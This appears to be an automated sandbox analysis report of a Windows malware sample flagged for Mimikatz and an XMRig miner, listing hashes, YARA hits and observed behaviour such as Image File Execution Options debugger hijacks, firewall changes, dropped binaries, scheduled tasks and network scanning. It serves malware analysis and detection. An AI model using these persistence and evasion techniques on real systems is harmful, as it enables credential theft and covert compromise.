Analysis
-
max time kernel
153s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02/05/2024, 04:31
Behavioral task
behavioral1
Sample
2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe
Resource
win7-20240419-en
General
-
Target
2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
9678346907a855cfe9695d5570d4ddf9
-
SHA1
7e3aa484eebf37b4bcdb564da6e94febd39c43fd
-
SHA256
bc6162b3ee8f11c508a68af4013ee3f7280680a797a4f032ceee63cb16eb9683
-
SHA512
0a26b5b707f3ac3129695533ffdf1b626578ba6d917177f9da9b8685627a843adf53b9eb042b632f302d9105ec646a8b966fcaf3bd5d8833ef5a6f055f839598
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3168 created 1896 3168 iylstni.exe 37 -
Contacts a large (25270) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource yara_rule behavioral2/memory/5092-136-0x00007FF675870000-0x00007FF67595E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral2/memory/5092-138-0x00007FF675870000-0x00007FF67595E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 41 IoCs
resource yara_rule behavioral2/memory/5076-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/5076-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000800000002325e-5.dat UPX behavioral2/memory/3084-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x00070000000232b6-134.dat UPX behavioral2/memory/5092-136-0x00007FF675870000-0x00007FF67595E000-memory.dmp UPX behavioral2/memory/5092-138-0x00007FF675870000-0x00007FF67595E000-memory.dmp UPX behavioral2/files/0x00070000000232bf-141.dat UPX behavioral2/memory/4316-142-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/4316-146-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/files/0x00070000000232c0-149.dat UPX behavioral2/memory/3628-150-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/1800-171-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-174-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/1972-178-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/2988-182-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3004-186-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-188-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/3628-189-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/2064-192-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/4604-196-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/1692-204-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/1892-208-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-210-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/2844-213-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-216-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/2760-218-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-221-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/832-223-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/5092-227-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/1528-242-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-243-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/6400-245-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/5152-248-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-249-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/636-251-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/4512-253-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/4240-255-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp UPX behavioral2/memory/3628-256-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/3628-259-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX behavioral2/memory/3628-261-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/3628-174-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-188-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-189-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-210-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-216-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-221-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-243-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-249-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-256-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-259-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig behavioral2/memory/3628-261-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/5076-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/5076-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000800000002325e-5.dat mimikatz behavioral2/memory/3084-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/5092-136-0x00007FF675870000-0x00007FF67595E000-memory.dmp mimikatz behavioral2/memory/5092-138-0x00007FF675870000-0x00007FF67595E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts iylstni.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts iylstni.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3780 netsh.exe 2680 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe iylstni.exe -
Executes dropped EXE 30 IoCs
pid Process 3084 iylstni.exe 3168 iylstni.exe 4388 wpcap.exe 3104 tttqsriea.exe 5092 vfshost.exe 4316 entlmlitm.exe 3628 lslnam.exe 1800 entlmlitm.exe 1872 xohudmc.exe 1764 gykgye.exe 1972 entlmlitm.exe 2988 entlmlitm.exe 3004 entlmlitm.exe 2064 entlmlitm.exe 4604 entlmlitm.exe 3812 iylstni.exe 1692 entlmlitm.exe 1892 entlmlitm.exe 2844 entlmlitm.exe 2760 entlmlitm.exe 832 entlmlitm.exe 5092 entlmlitm.exe 1528 entlmlitm.exe 3584 aubeaujvt.exe 6400 entlmlitm.exe 5152 entlmlitm.exe 636 entlmlitm.exe 4512 entlmlitm.exe 4240 entlmlitm.exe 3308 iylstni.exe -
Loads dropped DLL 12 IoCs
pid Process 4388 wpcap.exe 4388 wpcap.exe 4388 wpcap.exe 4388 wpcap.exe 4388 wpcap.exe 4388 wpcap.exe 4388 wpcap.exe 4388 wpcap.exe 4388 wpcap.exe 3104 tttqsriea.exe 3104 tttqsriea.exe 3104 tttqsriea.exe -
resource yara_rule behavioral2/files/0x00070000000232b6-134.dat upx behavioral2/memory/5092-136-0x00007FF675870000-0x00007FF67595E000-memory.dmp upx behavioral2/memory/5092-138-0x00007FF675870000-0x00007FF67595E000-memory.dmp upx behavioral2/files/0x00070000000232bf-141.dat upx behavioral2/memory/4316-142-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/4316-146-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/files/0x00070000000232c0-149.dat upx behavioral2/memory/3628-150-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/1800-171-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-174-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/1972-178-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/2988-182-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3004-186-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-188-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/3628-189-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/2064-192-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/4604-196-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/1692-204-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/1892-208-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-210-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/2844-213-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-216-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/2760-218-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-221-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/832-223-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/5092-227-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/1528-242-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-243-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/6400-245-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/5152-248-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-249-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/636-251-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/4512-253-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/4240-255-0x00007FF760E10000-0x00007FF760E6B000-memory.dmp upx behavioral2/memory/3628-256-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/3628-259-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx behavioral2/memory/3628-261-0x00007FF6A9020000-0x00007FF6A9140000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 ifconfig.me 80 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iylstni.exe File opened for modification C:\Windows\SysWOW64\gykgye.exe xohudmc.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\gykgye.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData iylstni.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content iylstni.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 iylstni.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\nbuyiybyv\UnattendGC\specials\cnli-1.dll iylstni.exe File opened for modification C:\Windows\nlmttyea\schoedcl.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\coli-0.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\posh-0.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\trfo-2.dll iylstni.exe File created C:\Windows\nlmttyea\iylstni.exe 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\tibe-2.dll iylstni.exe File created C:\Windows\nlmttyea\svschost.xml iylstni.exe File opened for modification C:\Windows\nlmttyea\svschost.xml iylstni.exe File created C:\Windows\nbuyiybyv\Corporate\vfshost.exe iylstni.exe File opened for modification C:\Windows\nbuyiybyv\smnabayei\Packet.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\libxml2.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\docmicfg.exe iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\svschost.xml iylstni.exe File opened for modification C:\Windows\nlmttyea\vimpcsvc.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\svschost.exe iylstni.exe File created C:\Windows\nbuyiybyv\Corporate\mimidrv.sys iylstni.exe File created C:\Windows\nbuyiybyv\smnabayei\wpcap.exe iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\spoolsrv.exe iylstni.exe File created C:\Windows\nlmttyea\spoolsrv.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\AppCapture64.dll iylstni.exe File created C:\Windows\nbuyiybyv\smnabayei\aubeaujvt.exe iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\ssleay32.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\ucl.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\schoedcl.exe iylstni.exe File created C:\Windows\nbuyiybyv\Corporate\mimilib.dll iylstni.exe File created C:\Windows\nbuyiybyv\smnabayei\Packet.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\crli-0.dll iylstni.exe File created C:\Windows\nlmttyea\docmicfg.xml iylstni.exe File opened for modification C:\Windows\nlmttyea\docmicfg.xml iylstni.exe File opened for modification C:\Windows\nlmttyea\iylstni.exe 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\zlib1.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\vimpcsvc.exe iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\docmicfg.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\Shellcode.ini iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\trch-1.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\vimpcsvc.xml iylstni.exe File opened for modification C:\Windows\nlmttyea\spoolsrv.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\AppCapture32.dll iylstni.exe File opened for modification C:\Windows\nbuyiybyv\Corporate\log.txt cmd.exe File opened for modification C:\Windows\nbuyiybyv\smnabayei\Result.txt aubeaujvt.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\tucl-1.dll iylstni.exe File created C:\Windows\nbuyiybyv\smnabayei\ip.txt iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\libeay32.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\spoolsrv.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\spoolsrv.xml iylstni.exe File created C:\Windows\ime\iylstni.exe iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\exma-1.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\schoedcl.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\svschost.xml iylstni.exe File created C:\Windows\nlmttyea\schoedcl.xml iylstni.exe File created C:\Windows\nbuyiybyv\upbdrjv\swrpwe.exe iylstni.exe File created C:\Windows\nbuyiybyv\smnabayei\tttqsriea.exe iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\docmicfg.xml iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\schoedcl.xml iylstni.exe File created C:\Windows\nlmttyea\vimpcsvc.xml iylstni.exe File created C:\Windows\nbuyiybyv\smnabayei\scan.bat iylstni.exe File created C:\Windows\nbuyiybyv\smnabayei\wpcap.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\specials\xdvl-0.dll iylstni.exe File created C:\Windows\nbuyiybyv\UnattendGC\vimpcsvc.xml iylstni.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3000 sc.exe 920 sc.exe 832 sc.exe 2964 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000800000002325e-5.dat nsis_installer_2 behavioral2/files/0x0009000000023272-15.dat nsis_installer_1 behavioral2/files/0x0009000000023272-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3700 schtasks.exe 3064 schtasks.exe 2712 schtasks.exe -
Modifies data under HKEY_USERS 47 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iylstni.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iylstni.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iylstni.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" iylstni.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iylstni.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" iylstni.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created 